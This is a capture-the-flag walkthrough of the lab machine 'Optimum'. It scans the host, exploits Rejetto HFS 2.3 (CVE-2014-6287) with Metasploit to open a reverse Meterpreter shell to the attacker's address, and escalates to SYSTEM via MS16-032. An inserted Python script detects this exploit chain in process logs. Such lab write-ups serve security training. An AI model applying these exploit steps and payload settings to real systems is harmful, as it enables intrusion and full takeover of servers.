Optimum

2 March 2021

Starting information

  • Machine IP : 10.10.10.8
  • System : Windows

Network enumeration

I start by modifying my /etc/hosts file to avoid writing the IP every time:

/etc/hosts
10.10.10.8 optimum

Then I look for open ports:

nmap -p- optimum -Pn
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-02 08:47 CET
Nmap scan report for optimum (10.10.10.8)
Host is up (0.040s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE
80/tcp open  http

Nmap done: 1 IP address (1 host up) scanned in 107.31 seconds

There is only one open port: 80. Now I can start nmap scripts on the open port to gather more information:

nmap -p80 -A -Pn optimum
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-03-02 08:50 CET
Nmap scan report for optimum (10.10.10.8)
Host is up (0.049s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    HttpFileServer httpd 2.3
|_http-server-header: HFS 2.3
|_http-title: HFS /
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.99 seconds

Information gathered

Operating System

Windows

Open ports

Port     Service
80/tcp   http

This port runs a Rejetto HTTP File Server (HFS), version 2.3. This information is also displayed directly on the web page itself.

Vulnerabilities

A quick search for HFS 2.3 yields multiple results indicating that this version is vulnerable to remote command execution (CVE-2014-6287). Exploit Database and digitalmunition even provide exploit code.

In this case, I'll play script kiddie and just run the script to get the first flag. Running it gives me a user shell from which I retrieve the user flag. I now need to find a way to escalate privileges.

Switching to metasploit

To continue the exploitation, I switch to Metasploit. I start the program with sudo msfconsole-start, then search for the exploit I previously used with search hfs.

msf6 > search hfs

Matching Modules
================

   #  Name                                        Disclosure Date  Rank       Check  Description
   -  ----                                        ---------------  ----       -----  -----------
   0  exploit/multi/http/git_client_command_exec  2014-12-18       excellent  No     Malicious Git and Mercurial HTTP Server For CVE-2014-9390
   1  exploit/windows/http/rejetto_hfs_exec       2014-09-11       excellent  Yes    Rejetto HttpFileServer Remote Command Execution


Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/http/rejetto_hfs_exec

I select the right exploit with the command use <exploit_path>:

msf6 > use exploit/windows/http/rejetto_hfs_exec
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp

I configure my payload with set <option_name> <option_value>:

msf6 exploit(windows/http/rejetto_hfs_exec) > set LHOST 10.10.14.9
LHOST => 10.10.14.9
msf6 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS 10.10.10.8
RHOSTS => 10.10.10.8

In metasploit, use show options to find out what you can configure.

Finally I can use exploit to start the exploit:

msf6 exploit(windows/http/rejetto_hfs_exec) > exploit

[*] Started reverse TCP handler on 10.10.14.9:4444
[*] Using URL: http://0.0.0.0:5555/ZLXJo9B
[*] Local IP: http://10.0.2.15:5555/ZLXJo9B
[*] Server started.
[*] Sending a malicious request to /
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
/usr/share/metasploit-framework/modules/exploits/windows/http/rejetto_hfs_exec.rb:110: warning: URI.escape is obsolete
[*] Payload request received: /ZLXJo9B
[*] Sending stage (175174 bytes) to 10.10.10.8
[*] Meterpreter session 1 opened (10.10.14.9:4444 -> 10.10.10.8:49170) at 2021-03-02 09:26:13 +0100
[!] Tried to delete %TEMP%\GvutIggGGOnltT.vbs, unknown result
[*] Server stopped.

meterpreter >

I now have a proper shell in meterpreter:

meterpreter > dir
Listing: C:\Users\kostas\Desktop
================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40777/rwxrwxrwx   0       dir   2021-03-08 18:30:22 +0100  %TEMP%
100666/rw-rw-rw-  282     fil   2017-03-18 12:57:16 +0100  desktop.ini
100777/rwxrwxrwx  760320  fil   2014-02-16 12:58:52 +0100  hfs.exe
100444/r--r--r--  32      fil   2017-03-18 13:13:18 +0100  user.txt.txt
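The session above shows what this exploit chain looks like from the host's side: the HFS server process (hfs.exe, sitting on the user's desktop) ends up launching a command that runs a .vbs dropper out of %TEMP%. The following detection logic, added here as an example and not part of the original write-up, scans constructed Sysmon-style process-creation records for exactly that parent/child relationship and for scripts executed from a temp directory. Field names (ParentImage, Image, CommandLine) and the sample command lines are assumptions modelled on Sysmon Event ID 1.

```python
import re

# Constructed process-creation records (Sysmon Event ID 1 style), not logs
# taken from the box. The .vbs name is the one reported by the exploit output.
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Users\kostas\Desktop\hfs.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"cmd.exe /c cscript.exe //nologo %TEMP%\GvutIggGGOnltT.vbs"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe desktop.ini"},
    {"ParentImage": r"C:\Users\kostas\Desktop\hfs.exe",
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r'cmd.exe /c del "C:\Users\kostas\AppData\Local\Temp\GvutIggGGOnltT.vbs"'},
]

# A file server has no business spawning interpreters or command shells.
SCRIPT_HOSTS = {"cmd.exe", "cscript.exe", "wscript.exe", "powershell.exe"}

# Script files referenced under %TEMP% or a ...\Temp\ path, case-insensitive.
TEMP_SCRIPT = re.compile(r"(%TEMP%|\\Temp\\)[^\s\"']*\.vbs", re.IGNORECASE)


def basename(path):
    """Return the lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of reasons an event is suspicious (empty if benign)."""
    reasons = []
    parent = basename(event["ParentImage"])
    child = basename(event["Image"])
    if parent == "hfs.exe" and child in SCRIPT_HOSTS:
        reasons.append("hfs.exe spawned a command or script host")
    if TEMP_SCRIPT.search(event["CommandLine"]):
        reasons.append("VBScript referenced under a temp directory")
    return reasons


def scan(events):
    """Return (index, reasons) for every event that triggers at least one rule."""
    hits = []
    for i, event in enumerate(events):
        reasons = classify(event)
        if reasons:
            hits.append((i, reasons))
    return hits


if __name__ == "__main__":
    for idx, why in scan(SAMPLE_EVENTS):
        print(f"ALERT event {idx}: {'; '.join(why)}")
```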

Information gathering

I can use the sysinfo command to retrieve information about my current session:

meterpreter > sysinfo
Computer        : OPTIMUM
OS              : Windows 2012 R2 (6.3 Build 9600).
Architecture    : x64
System Language : el_GR
Domain          : HTB
Logged On Users : 1
Meterpreter     : x86/windows

And I can use getuid to get info about my current user:

meterpreter > getuid
Server username: OPTIMUM\kostas

Unfortunately my user is not an administrator, so I'll have to perform a privilege escalation.

Getting root

Meterpreter provides the getsystem command to attempt to elevate the user privileges:

    Command       Description
    -------       -----------
    getsystem     Attempt to elevate your privilege to that of local system.

Unfortunately it fails on this system:

meterpreter > getsystem
[-] 2001: Operation failed: Access is denied. The following was attempted:
[-] Named Pipe Impersonation (In Memory/Admin)
[-] Named Pipe Impersonation (Dropper/Admin)
[-] Token Duplication (In Memory/Admin)
[-] Named Pipe Impersonation (RPCSS variant)

After a quick search for "Windows 2012 R2 privilege escalation", I can see that there are some vulnerabilities I can exploit through this session. I put the session in the background with bg, return to the main menu with back, and search for the exploit named MS16_032:

meterpreter > bg
[*] Backgrounding session 1...
msf6 exploit(windows/http/rejetto_hfs_exec) > back
msf6 > search MS16_032

Matching Modules
================

   #  Name                                                           Disclosure Date  Rank    Check  Description
   -  ----                                                           ---------------  ----    -----  -----------
   0  exploit/windows/local/ms16_032_secondary_logon_handle_privesc  2016-03-21       normal  Yes    MS16-032 Secondary Logon Handle Privilege Escalation


Interact with a module by name or index. For example info 0, use 0 or use exploit/windows/local/ms16_032_secondary_logon_handle_privesc

I select this exploit with the use command and set the SESSION, LHOST and LPORT options. I make sure that the LPORT is a new port that isn't already in use.

Use sessions -l to list active sessions.

Now I can start the script with exploit, and there I have my admin shell:

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM